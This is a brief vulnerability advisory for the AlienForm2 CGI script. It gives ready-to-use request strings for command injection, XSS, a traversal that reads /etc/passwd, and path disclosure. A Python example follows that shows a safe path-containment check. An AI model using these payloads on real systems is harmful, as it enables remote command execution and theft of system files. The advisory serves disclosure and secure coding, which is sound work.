Script: AlienForm2
Version: 2.02
Vendor: Jon Hedley
Archive: http://web.archive.org/web/19991013185606/www.cgi.tj/scripts/alienform/af.txt
Credit: anonymous

Command exec:
/af.cgi?_browser_out=;/bin/ls|

XSS (straight up style, no "> needed).
Parameter: _browser_out
Parameter: _send_email
Parameter: _send_email2

Traversal (OSVDB 836 is a traversal as well, but the fix was incomplete and still allows traversal with a slightly modified path):
/af.cgi?_browser_out=/./..././..././..././..././..././..././..././..././..././..././...//etc/passwd

Path disclosure:
/af.cgi?_browser_out=anyinvalidfilename
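
Added example (Python, not AlienForm2's Perl and not code from this advisory): why a partial traversal filter can still pass a path shaped like the one above, next to a canonicalize-then-contain check that rejects it. The single-pass `../` deletion in `naive_resolve` is an assumption about the kind of incomplete fix, not the script's actual code; `TEMPLATE_ROOT`, `SAMPLE` and all function names are hypothetical.

```python
import os
import posixpath

TEMPLATE_ROOT = "/var/www/af_templates"  # assumed template directory (hypothetical)

# Same pattern as the advisory's traversal value, shortened (constructed sample).
SAMPLE = "/./" + "..././" * 3 + "...//etc/passwd"


def naive_resolve(name):
    """Hypothetical incomplete fix: delete '../' in one pass, then build the path."""
    cleaned = name.replace("../", "")  # '.../' followed by './' collapses to '../'
    # normpath models the path the OS would end up opening; no file is touched.
    return posixpath.normpath(TEMPLATE_ROOT + "/" + cleaned)


def safe_resolve(name):
    """Canonicalize first, then require the result to stay under TEMPLATE_ROOT."""
    root = os.path.realpath(TEMPLATE_ROOT)
    if "\x00" in name or os.path.isabs(name):
        raise ValueError("invalid template name")
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        # Generic message: the server path is not echoed back to the client.
        raise ValueError("invalid template name")
    return candidate


def is_rejected(name):
    """True when safe_resolve refuses the value."""
    try:
        safe_resolve(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("naive:", naive_resolve(SAMPLE))
    for value in (SAMPLE, "../../../etc/passwd", "thanks.txt"):
        print("safe :", repr(value), "rejected" if is_rejected(value) else "accepted")
```

The containment check is applied to the final canonical path rather than to the raw string, so it does not depend on guessing every spelling a filter might miss.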